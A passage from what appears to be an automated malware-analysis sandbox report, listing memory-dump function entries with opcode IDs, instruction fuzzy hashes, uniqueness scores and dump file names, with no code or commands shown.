                                        • Opcode Fuzzy Hash: 812cb31c7b1593878fde18b519e9c1e05b112ea715e99bbe81f8b27c02977e16
                                        • Instruction Fuzzy Hash: DC31A071E40618CBDB14EBB8C9087ADBBE2BF84305F15842AC416AB391DF789C85CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a645cb0eb0b9ea3d46b2768902cfbce97827b9a5f5698d2773f2562309c19616
                                        • Instruction ID: 8737cf46fad2037262b19882126a00aa38250977e517acf765f2e3a2997c888d
                                        • Opcode Fuzzy Hash: a645cb0eb0b9ea3d46b2768902cfbce97827b9a5f5698d2773f2562309c19616
                                        • Instruction Fuzzy Hash: 24319571E40215CBDB14EFB8C90879DB7E6AF84305F15856AC4069B291DBB89C85CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5327144840162ca18f56a07992bf0e6e624b6411e2ff0b78b07bfab65d9171c9
                                        • Instruction ID: 1ee6f4b29e6ad3c0c3bb6b9cdc995dbee852795dae72523402debb1e1aade8ab
                                        • Opcode Fuzzy Hash: 5327144840162ca18f56a07992bf0e6e624b6411e2ff0b78b07bfab65d9171c9
                                        • Instruction Fuzzy Hash: C9318471E402158BDB24EFB8C9487ADBBE6BF84305F15842AD4069B391DFB89C85CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab40fd721d1cdd341ff23c924f03309efa4e40700a72b67f027b54d0152fb16e
                                        • Instruction ID: 23a22a58924aa9fa5b5f23114df2b96d73153960ef52097c5582693f719374d3
                                        • Opcode Fuzzy Hash: ab40fd721d1cdd341ff23c924f03309efa4e40700a72b67f027b54d0152fb16e
                                        • Instruction Fuzzy Hash: 2F31B271E40614CBDB14EFB8C8087ADBBE6AF84314F15842AC40AAB391DB789C85CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b8163c965228bd50d0c4ca1c9af34cc907b31c13c22f88a56ce0bbe932aa735
                                        • Instruction ID: ed358192f91b523d36e04c3deea809615a8817d204156c42f4acde54a148d1ea
                                        • Opcode Fuzzy Hash: 0b8163c965228bd50d0c4ca1c9af34cc907b31c13c22f88a56ce0bbe932aa735
                                        • Instruction Fuzzy Hash: 76319171E40215CBDB14EBA8C508BADB7F6BF84305F15842AD506AB391DBB89C85CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfd1e3edb1338facd569b1f3af42b38804c1d6bc5273c7802390b67e8a579e66
                                        • Instruction ID: 0b17a1c33eb066c38590cb6e228087253d8743ea822bd7d9b4eeedd7f32aa982
                                        • Opcode Fuzzy Hash: dfd1e3edb1338facd569b1f3af42b38804c1d6bc5273c7802390b67e8a579e66
                                        • Instruction Fuzzy Hash: F5319F71E40214CBDB24EFA8C5087ADBBF2AF84B05F15842AD406AB391DB789D85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f02750d0bc07aabc0b285788f63ed07e8af579ba7c5d0194bc73a2d24c9c5eb
                                        • Instruction ID: ac2fa36607d2ec141e8903487fa062560422bf5492e0c2f152cd6d53c61c72ec
                                        • Opcode Fuzzy Hash: 0f02750d0bc07aabc0b285788f63ed07e8af579ba7c5d0194bc73a2d24c9c5eb
                                        • Instruction Fuzzy Hash: 2C31D371E002158BDB14EFB8C9087ADBBF2AF84305F11846AC506DB391DBB89D85CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 954ad1287255db3b2811a38dca41768929dfe8f2c7f7e3743161718ea23008a6
                                        • Instruction ID: 7c26e3f508dccfb561e61058dc12c8ec2b29b476b457a1afcb4dcc70fef1c3d5
                                        • Opcode Fuzzy Hash: 954ad1287255db3b2811a38dca41768929dfe8f2c7f7e3743161718ea23008a6
                                        • Instruction Fuzzy Hash: BC31C270E40614CBDB14EBB8C4087ADBBF6AF84309F11842AC40A9B791DFB89C85CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58add2494de110e1307b6bdf43a43a7ffe9701041b8c9e3f462dbeda4c48370d
                                        • Instruction ID: 0a243da454b677f1d82403a9150850ceecc4b2522aeb63ea21e9b83cec5bf787
                                        • Opcode Fuzzy Hash: 58add2494de110e1307b6bdf43a43a7ffe9701041b8c9e3f462dbeda4c48370d
                                        • Instruction Fuzzy Hash: AF317270E00215CBDB14EBB8C5487ADBBF6AF84304F15842AD506AB691DBB89D85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b4ebd0ea6ceb2570f3c3cb77587a24fc3049e649988609e0b3c170b762a1bcc
                                        • Instruction ID: 0f977fbdcdd9d902ea2e9039df554fd6f9f2dfa5faf35c30f62e21cd1812003e
                                        • Opcode Fuzzy Hash: 9b4ebd0ea6ceb2570f3c3cb77587a24fc3049e649988609e0b3c170b762a1bcc
                                        • Instruction Fuzzy Hash: CC31C470A00214CBDB14EF68C5187ADBBF2AF84B04F15856AD406EB391CBB88D85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3b4e009a9256f09b30936479475597527b7176eca838af77915f09e3960f9f1
                                        • Instruction ID: 3fd610a9ac3eb5d62d5071482e48312b5425b5983e185718eaee14206bc20d31
                                        • Opcode Fuzzy Hash: a3b4e009a9256f09b30936479475597527b7176eca838af77915f09e3960f9f1
                                        • Instruction Fuzzy Hash: 7721A135B002144BEF007BB59C187AE37B6AF84711F05492AE902D7390EF79DD458BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339378663.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85583018e2c93f500da1977862fbea4a9650b0a43c58a38b6fda3f7a9558860c
                                        • Instruction ID: 25ef48c5164a6cfcc497a0654a10896f7cf77ff09d9f0382aa59811646b039e4
                                        • Opcode Fuzzy Hash: 85583018e2c93f500da1977862fbea4a9650b0a43c58a38b6fda3f7a9558860c
                                        • Instruction Fuzzy Hash: 3421F275604208DFDB14DF50E980B26BBB5EF84318F34C9A9E80E4B246C336D847CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339378663.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e38a51163836b9afa7cb66af505cafac705ed11132b8bfb1a128761e6aaa7cac
                                        • Instruction ID: 249b9e0ae95b3a74ba54f2f94c0b96b9779f43781d0ce27c9800a71273081d6c
                                        • Opcode Fuzzy Hash: e38a51163836b9afa7cb66af505cafac705ed11132b8bfb1a128761e6aaa7cac
                                        • Instruction Fuzzy Hash: FF217A7140D3C49FCB038B24D894B15BF71AF46214F29C5DBD8888F2A3C33A984ACB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions